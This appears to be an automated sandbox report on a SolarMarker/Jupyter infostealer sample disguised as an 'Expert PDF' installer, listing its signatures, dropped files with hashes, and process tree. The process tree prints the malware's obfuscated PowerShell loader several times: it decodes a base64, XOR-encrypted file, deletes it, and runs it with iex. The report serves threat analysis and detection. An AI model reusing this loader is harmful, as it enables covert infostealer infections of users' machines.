Analysis

  • max time kernel
    1218s
  • max time network
    1234s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-03-2023 18:08

General

  • Target

    07d8c9f5-af55-421d-9023-7932ab1810d7.exe

  • Size

    107.4MB

  • MD5

    92d910e072b9bbce6a329bbe9686cf7e

  • SHA1

    4e4e2c6e1aaf406f1008eef4de4068c67a56c7f1

  • SHA256

    07e3113b6d2367f8fab4668b46620fd6b6d15d0c3d21d4f066cedb8c54340e4b

  • SHA512

    f5f10912ef3e2f6520aba4fe9986d174451b1eb8d38a0b652ed4a6d463d26d1bf121a26298616304b484d42ecc5c11a68ae295a9e92b0d09df5067f7af439e2a

  • SSDEEP

    196608:0kkzOa/slizxM7S8ocpzL28DsOa0wyEcJ50:0kdYM71zaMsOaxbcJ2

Malware Config

Signatures

  • Jupyter, SolarMarker

    Jupyter is a backdoor and infostealer first seen in mid 2020.

  • Blocklisted process makes network request 64 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
  • NTFS ADS 10 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe
    "C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1644
    • C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp" /SL5="$C004A,111680340,999424,C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3672
      • C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe
        "C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:116
        • C:\Windows\SysWOW64\regsvr32.exe
          regsvr32.exe /s "C:\ProgramData\Expert PDF 14\Installation\Statistics.dll"
          4⤵
          • Loads dropped DLL
          • Modifies registry class
          PID:2612
        • C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe
          "C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe" /RegServer
          4⤵
          • Executes dropped EXE
          • Modifies registry class
          PID:1300
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
        3⤵
        • Blocklisted process makes network request
        • NTFS ADS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4392
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
        3⤵
        • Blocklisted process makes network request
        • NTFS ADS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4252
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
        3⤵
        • Blocklisted process makes network request
        • NTFS ADS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3676
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
        3⤵
        • Blocklisted process makes network request
        • NTFS ADS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1924
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
        3⤵
        • Blocklisted process makes network request
        • NTFS ADS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3080
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
        3⤵
        • Blocklisted process makes network request
        • NTFS ADS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5020
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
        3⤵
        • Blocklisted process makes network request
        • NTFS ADS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1568
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
        3⤵
        • Blocklisted process makes network request
        • NTFS ADS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2492
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
        3⤵
        • Blocklisted process makes network request
        • NTFS ADS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2456
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
        3⤵
        • Blocklisted process makes network request
        • NTFS ADS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:980
  • C:\Windows\SysWOW64\DllHost.exe
    C:\Windows\SysWOW64\DllHost.exe /Processid:{D512BD03-0077-4504-AE19-566B43F44E19}
    1⤵
    • Loads dropped DLL
    PID:4488

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe

    Filesize

    11.7MB

    MD5

    440d4f0c478b77d0e1a95e8165dfb650

    SHA1

    d8cd10e080167a93273a6969b61648ce9b9debb2

    SHA256

    19834ba63fc5f104f81d991a93593acde4bb49c10883e66344b8797caf4a5462

    SHA512

    a8c0b99c9f7f64ad440dd640f5e00b471514fd322af565796dd8fac8b4aabb693ccbcf1698e7082a3e1e188ead68081db13197555ba6b1ff5ef1dbc7b32bbbc5

  • C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe

    Filesize

    11.7MB

    MD5

    440d4f0c478b77d0e1a95e8165dfb650

    SHA1

    d8cd10e080167a93273a6969b61648ce9b9debb2

    SHA256

    19834ba63fc5f104f81d991a93593acde4bb49c10883e66344b8797caf4a5462

    SHA512

    a8c0b99c9f7f64ad440dd640f5e00b471514fd322af565796dd8fac8b4aabb693ccbcf1698e7082a3e1e188ead68081db13197555ba6b1ff5ef1dbc7b32bbbc5

  • C:\ProgramData\Expert PDF 14\Installation\Statistics.dll

    Filesize

    1.9MB

    MD5

    e645ca01c01f9f8489c07a6b41fbd318

    SHA1

    3e8ea394f6605bd8529c58a143f01675adee371a

    SHA256

    a9145b41491019af4e89c5736c0d9d1fc83ab9786ec3dfb27da9be4e40cff27e

    SHA512

    c220bd620f03f38286899ed124abde69ed0812c2c1ef84031a02abd39faa4975255bc6a2bff8900d0294ac2f508344131be8cc6d8765aa46d430a135bb1af2b6

  • C:\ProgramData\Expert PDF 14\Installation\Statistics.dll

    Filesize

    1.9MB

    MD5

    e645ca01c01f9f8489c07a6b41fbd318

    SHA1

    3e8ea394f6605bd8529c58a143f01675adee371a

    SHA256

    a9145b41491019af4e89c5736c0d9d1fc83ab9786ec3dfb27da9be4e40cff27e

    SHA512

    c220bd620f03f38286899ed124abde69ed0812c2c1ef84031a02abd39faa4975255bc6a2bff8900d0294ac2f508344131be8cc6d8765aa46d430a135bb1af2b6

  • C:\ProgramData\Expert PDF 14\Installation\Statistics.dll

    Filesize

    1.9MB

    MD5

    e645ca01c01f9f8489c07a6b41fbd318

    SHA1

    3e8ea394f6605bd8529c58a143f01675adee371a

    SHA256

    a9145b41491019af4e89c5736c0d9d1fc83ab9786ec3dfb27da9be4e40cff27e

    SHA512

    c220bd620f03f38286899ed124abde69ed0812c2c1ef84031a02abd39faa4975255bc6a2bff8900d0294ac2f508344131be8cc6d8765aa46d430a135bb1af2b6

  • C:\ProgramData\Expert PDF 14\Installation\Statistics.dll

    Filesize

    1.9MB

    MD5

    e645ca01c01f9f8489c07a6b41fbd318

    SHA1

    3e8ea394f6605bd8529c58a143f01675adee371a

    SHA256

    a9145b41491019af4e89c5736c0d9d1fc83ab9786ec3dfb27da9be4e40cff27e

    SHA512

    c220bd620f03f38286899ed124abde69ed0812c2c1ef84031a02abd39faa4975255bc6a2bff8900d0294ac2f508344131be8cc6d8765aa46d430a135bb1af2b6

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

    Filesize

    53KB

    MD5

    d4d8cef58818612769a698c291ca3b37

    SHA1

    54e0a6e0c08723157829cea009ec4fe30bea5c50

    SHA256

    98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

    SHA512

    f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

    Filesize

    53KB

    MD5

    d4d8cef58818612769a698c291ca3b37

    SHA1

    54e0a6e0c08723157829cea009ec4fe30bea5c50

    SHA256

    98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

    SHA512

    f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

    Filesize

    53KB

    MD5

    d4d8cef58818612769a698c291ca3b37

    SHA1

    54e0a6e0c08723157829cea009ec4fe30bea5c50

    SHA256

    98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

    SHA512

    f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

    Filesize

    53KB

    MD5

    d4d8cef58818612769a698c291ca3b37

    SHA1

    54e0a6e0c08723157829cea009ec4fe30bea5c50

    SHA256

    98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

    SHA512

    f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

    Filesize

    53KB

    MD5

    d4d8cef58818612769a698c291ca3b37

    SHA1

    54e0a6e0c08723157829cea009ec4fe30bea5c50

    SHA256

    98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

    SHA512

    f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

    Filesize

    53KB

    MD5

    d4d8cef58818612769a698c291ca3b37

    SHA1

    54e0a6e0c08723157829cea009ec4fe30bea5c50

    SHA256

    98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

    SHA512

    f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

    Filesize

    53KB

    MD5

    d4d8cef58818612769a698c291ca3b37

    SHA1

    54e0a6e0c08723157829cea009ec4fe30bea5c50

    SHA256

    98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

    SHA512

    f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_umbfj5me.3wd.psm1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe

    Filesize

    11.7MB

    MD5

    440d4f0c478b77d0e1a95e8165dfb650

    SHA1

    d8cd10e080167a93273a6969b61648ce9b9debb2

    SHA256

    19834ba63fc5f104f81d991a93593acde4bb49c10883e66344b8797caf4a5462

    SHA512

    a8c0b99c9f7f64ad440dd640f5e00b471514fd322af565796dd8fac8b4aabb693ccbcf1698e7082a3e1e188ead68081db13197555ba6b1ff5ef1dbc7b32bbbc5

  • C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe

    Filesize

    11.7MB

    MD5

    440d4f0c478b77d0e1a95e8165dfb650

    SHA1

    d8cd10e080167a93273a6969b61648ce9b9debb2

    SHA256

    19834ba63fc5f104f81d991a93593acde4bb49c10883e66344b8797caf4a5462

    SHA512

    a8c0b99c9f7f64ad440dd640f5e00b471514fd322af565796dd8fac8b4aabb693ccbcf1698e7082a3e1e188ead68081db13197555ba6b1ff5ef1dbc7b32bbbc5

  • C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe

    Filesize

    11.7MB

    MD5

    440d4f0c478b77d0e1a95e8165dfb650

    SHA1

    d8cd10e080167a93273a6969b61648ce9b9debb2

    SHA256

    19834ba63fc5f104f81d991a93593acde4bb49c10883e66344b8797caf4a5462

    SHA512

    a8c0b99c9f7f64ad440dd640f5e00b471514fd322af565796dd8fac8b4aabb693ccbcf1698e7082a3e1e188ead68081db13197555ba6b1ff5ef1dbc7b32bbbc5

  • C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\_isetup\_isdecmp.dll

    Filesize

    34KB

    MD5

    c6ae924ad02500284f7e4efa11fa7cfc

    SHA1

    2a7770b473b0a7dc9a331d017297ff5af400fed8

    SHA256

    31d04c1e4bfdfa34704c142fa98f80c0a3076e4b312d6ada57c4be9d9c7dcf26

    SHA512

    f321e4820b39d1642fc43bf1055471a323edcc0c4cbd3ddd5ad26a7b28c4fb9fc4e57c00ae7819a4f45a3e0bb9c7baa0ba19c3ceedacf38b911cdf625aa7ddae

  • C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\_isetup\_isdecmp.dll

    Filesize

    34KB

    MD5

    c6ae924ad02500284f7e4efa11fa7cfc

    SHA1

    2a7770b473b0a7dc9a331d017297ff5af400fed8

    SHA256

    31d04c1e4bfdfa34704c142fa98f80c0a3076e4b312d6ada57c4be9d9c7dcf26

    SHA512

    f321e4820b39d1642fc43bf1055471a323edcc0c4cbd3ddd5ad26a7b28c4fb9fc4e57c00ae7819a4f45a3e0bb9c7baa0ba19c3ceedacf38b911cdf625aa7ddae

  • C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp

    Filesize

    3.1MB

    MD5

    a95712856401dda069ee07c719bdb2ab

    SHA1

    73293e45116e0930d78087741016cde920922a74

    SHA256

    b4878d6b9d7462cafe81d20da148a44750aa707f4e34eae1f23f21f9e0d9afa0

    SHA512

    2ea973307830b193379a0b7698682bfecdfcc6bab685dcf60af1c23c94b16b862924148a2f9e8b2ac2b7734c3552193dc0459c7961ab8730b0282101fa22ff85

  • C:\Users\Admin\AppData\Roaming\wGITVhmXWQSqpZKRCtElfrun\TesVNngiWXdzUEPmMOBYwhcAuCZyRfIktrSaKvjFpJQLGlxbHoDq

    Filesize

    28KB

    MD5

    21fb2997c5f3ae724b68c0abe70d24dc

    SHA1

    a67e74c07b67c7b88260bc0b79d2306312f01b41

    SHA256

    8ffb8a0883f778a001250e734ec0d1ca8a3298a5c0bbcf413925f90d8e5f2fb2

    SHA512

    67cb54e8f0d0c0391cb9c60ec05b312f19e6934bd3affe9b08237d6932acd76b07a4a3075341cd153796211afd5fe3d684825ecfc49e17f2788b37df0bc0ad42

  • C:\Users\Admin\appdata\roaming\solarmarker.dat

    Filesize

    32B

    MD5

    3afc886140acb1fb8adf64e7de31aaf3

    SHA1

    4045e92781bb6d0218ad556103bd7cf2744d471d

    SHA256

    cd7fe991a85849fdeca6d5891561672feb6f12b5d52fd5dc00b3c6d3e1754f9a

    SHA512

    14f5e327c64c49ccb4f2874766c587f23b87908fee260b1e265b501f115bbd5f2260554c6283dd6e6a0dc8b40d17d2a8f7bad220bdce332a78b9590a4faca826

  • C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8

    Filesize

    55KB

    MD5

    9ad7347a02f60aa376133856f8618acb

    SHA1

    3377b9738c82647ff6f0fc741c58548fa8caaf31

    SHA256

    a4f9f4c9dfbe2e61dd8ebe5d1d9bd8a519d5a7833f2653820671a16b49855fea

    SHA512

    a912a3e881168ce1dc23d0c715323a7b02b0c522fd49f7da236d97f8cbb183c2d4bf2be97bac973dfba5852a607ad849e815afdd1c7f033bddafcc0303f18687

  • memory/980-388-0x0000000003240000-0x0000000003250000-memory.dmp

    Filesize

    64KB

  • memory/980-341-0x0000000003240000-0x0000000003250000-memory.dmp

    Filesize

    64KB

  • memory/980-207-0x0000000003240000-0x0000000003250000-memory.dmp

    Filesize

    64KB

  • memory/980-340-0x0000000003240000-0x0000000003250000-memory.dmp

    Filesize

    64KB

  • memory/980-209-0x0000000003240000-0x0000000003250000-memory.dmp

    Filesize

    64KB

  • memory/1568-374-0x0000000003080000-0x0000000003090000-memory.dmp

    Filesize

    64KB

  • memory/1568-313-0x0000000003080000-0x0000000003090000-memory.dmp

    Filesize

    64KB

  • memory/1568-337-0x0000000003080000-0x0000000003090000-memory.dmp

    Filesize

    64KB

  • memory/1568-203-0x0000000003080000-0x0000000003090000-memory.dmp

    Filesize

    64KB

  • memory/1568-324-0x0000000003080000-0x0000000003090000-memory.dmp

    Filesize

    64KB

  • memory/1644-133-0x0000000000400000-0x0000000000501000-memory.dmp

    Filesize

    1.0MB

  • memory/1644-306-0x0000000000400000-0x0000000000501000-memory.dmp

    Filesize

    1.0MB

  • memory/1644-176-0x0000000000400000-0x0000000000501000-memory.dmp

    Filesize

    1.0MB

  • memory/1924-197-0x00000000047E0000-0x00000000047F0000-memory.dmp

    Filesize

    64KB

  • memory/1924-334-0x00000000047E0000-0x00000000047F0000-memory.dmp

    Filesize

    64KB

  • memory/1924-191-0x0000000000C70000-0x0000000000CA6000-memory.dmp

    Filesize

    216KB

  • memory/1924-192-0x0000000004E20000-0x0000000005448000-memory.dmp

    Filesize

    6.2MB

  • memory/1924-375-0x00000000047E0000-0x00000000047F0000-memory.dmp

    Filesize

    64KB

